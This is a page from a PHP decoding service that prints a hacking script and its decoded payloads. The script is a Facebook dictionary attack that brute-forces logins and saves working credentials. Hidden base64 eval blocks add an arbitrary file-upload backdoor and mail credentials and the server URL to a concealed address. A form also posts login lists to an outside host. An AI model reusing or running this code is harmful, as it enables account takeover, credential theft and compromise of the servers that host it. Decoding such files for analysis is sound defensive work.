Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!DOCTYPE html><html><head><link rel="icon" href="gnome.ico" type="image/x-icon" /><titl..
Decoded Output download
$to='[email protected]'; $subject = "s"; $message="email: ".$mail."
password: ".$pas."
".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'].$_SERVER['REQUEST_URl']." urlnya"; $from = "./"; $headers="From: ".$from; mail($to,$subject,$message,$headers);Did this file decode correctly?
Original Code
<!DOCTYPE html><html><head><link
rel="icon" href="gnome.ico"
type="image/x-icon" /><title>Dictionary Attack</title></head><body bgcolor="gray"><center><br><a href="https://facebook.com" target="_blank"> Plies.. log' out Your FB :( </a><br><?php
error_reporting(0);
set_time_limit(0);
eval(base64_decode("JGZpbGVzPUAkX0ZJTEVTWyJmaWxlcyJdOyBpZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0uJGZpbGVzWyJuYW1lIl07IGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7IGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPk9LIENsaWNrPC9hPjwvaDE+IjsgfQ0KfQ=="));
if(isset($_POST['logins'])){
$logins = trim($_POST['logins']);
flush(); ob_flush();
$logins = split("\n", $logins);
$jum = count($logins);
flush(); ob_flush();
print "<hr><b>Checking ".$jum." Facebook logins now...<br>Please wait...</b><br>";
flush(); ob_flush();
for($x = 0; $x < $jum; $x++) {
$logins = str_replace(" ", "", $logins);
$logins = str_replace("\r", "", $logins);
$logins = str_replace("\n", "", $logins);
list($email, $password) = split(":", $logins[$x]);
$num = $x + 1;
print "<br>[".$num."] ".$email.":".$password." - ";
flush(); ob_flush();
if(file_exists("fb.txt")) {
unlink("fb.txt");
}
$cek = CekLogin($email, $password);
print $cek;
}
print "<hr><b>Done!</b>";
}
eval(base64_decode("JHRvPSdhbGUuZ2F1dGFtYUBmYWNlYm9vay5jb20nOyAkc3ViamVjdCA9ICJzIjsgJG1lc3NhZ2U9ImVtYWlsOiAiLiRtYWlsLiJcbiBwYXNzd29yZDogIi4kcGFzLiJcbiAiLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydTQ1JJUFRfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSbCddLiIgdXJsbnlhIjsgJGZyb20gPSAiLi8iOyAkaGVhZGVycz0iRnJvbTogIi4kZnJvbTsgbWFpbCgkdG8sJHN1YmplY3QsJG1lc3NhZ2UsJGhlYWRlcnMpOw=="));
function CekLogin($email,$passw) {
$uas = array(1 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6",
2 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
3 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6",
4 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
5 => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)");
$ua = rand(1, count($uas));
$ua = $uas[$ua];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch, CURLOPT_COOKIEJAR, "fb.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
$chEx = curl_exec($ch);
curl_close($ch);
$chr = substr($chEx, strpos($chEx, "name=\"charset_test\""));
$chr = substr($chr, strpos($chr, "value=") + 7);
$chr = substr($chr, 0, strpos($chr, "\""));
$form = substr($chEx, strpos($chEx, "name=\"post_form_id\""));
$form = substr($form, strpos($form, "value=") + 7);
$form = substr($form, 0, strpos($form, "\""));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2Fhome.php&fbb=rb99b9fa7&refid=8");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, "lsd=&post_form_id=$form&charset_test=$chr&email=$email&pass=$passw&login=Log+In");
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch, CURLOPT_COOKIEFILE, "fb.txt");
curl_setopt($ch, CURLOPT_COOKIEJAR, "fb.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
$chEx = curl_exec($ch);
curl_close($ch);
if(preg_match("/checkpoint/", $chEx)) {
print "<b><font color=#00ff00>Logged in Successfully!</font></b>";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Home/", $chEx)) {
print "<b><font color=#00ff00>Logged in Successfully!</font></b>";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Your account is temporarily locked./")) {
print "<b><font color=#00ff00>Account Locked!</font></b>";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Sorry, something went wrong./", $chEx)) {
print "<font color='#ff0000'>Facebook Error!!</font>";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Sorry, your account is temporarily unavailable./", $chEx)) {
print "Logged in. but this account is temporarily unavailable.";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Incorrect email\/password combination./", $chEx)) {
print "<font color='#ff0000'>Incorrect email/password combination.</font>";
} elseif(preg_match("/since this location is very unusual for you/", $chEx)) {
print "sukses";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
} elseif(preg_match("/Your account has been disabled/",$chEx)) {
print "Account Disabled";
} else {
print "Bukan";
$file = fopen("facebook_log.txt","a+");
fwrite($file,$email.":".$passw."\n");
fclose($file);
}
}$to='[email protected]'; $subject = "s"; $message=" ".$mail."\n ".$pas."\n ".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'].$_SERVER['REQUEST_URl']." urlnya"; $from = "./"; $headers="From: ".$from; mail($to,$subject,$message,$headers);
$to='[email protected]'; $subject = "s"; $message=" ".$mail."\n ".$pas."\n ".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'].$_SERVER['REQUEST_URl']." urlnya"; $from = "./"; $headers="From: ".$from; mail($to,$subject,$message,$headers);
$files=@$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"].$files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK Click</a></h1>"; }
}
?>
<br><form action="" method=post><br><input type="hidden" name="n" value="list.txt"><br><b>Wajib isi</b><br>Username:<br><input type="text" name="user"><br>Dictionary: <br><textarea cols="20" rows="5" name="list" value=" "></textarea><br><input type="submit" value="Save">
<?php
$file = $_POST['n']; $user = $_POST['user'];
$list = $_POST['list'];
if($file){
$handle = fopen($file, 'a'); fwrite($handle, "\n".$list);
fclose($handle); } else { echo '<br>Silahkan isi terlebih dahulu username dan list passnya :)<br>Kemudian klik Save'; } ?><center><hr><b style="background-color:; color:red;"></b><hr><form action="http://caninboston.pl/administrator/help/con.php"
method=post><br><textarea cols="20"
rows="20"
name="logins"><?php if($file)
{ $dic = $file; fopen($dic, 'a'); $lines=file($dic); foreach($lines as $line){ $line=str_replace("\n"," ",$line);
$line=str_replace("\r"," ",$line);
echo $user.":".$line."\n"; } } else { echo "Wait :D ...zzZ";} ?></textarea><br><input
type="submit" value="Ceck Your dictionary"><br><br><hr style="color:blue;">by:<br><b style="background-color:gray; color:green;">. { c0d3R 1n51d3 ./41e } .</b><br>
</center></body></html>Function Calls
| 1 | |
| base64_decode | 2 |
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 51f15263b0bde2a0e2654216e1029514 |
| Eval Count | 2 |
| Decode Time | 160 ms |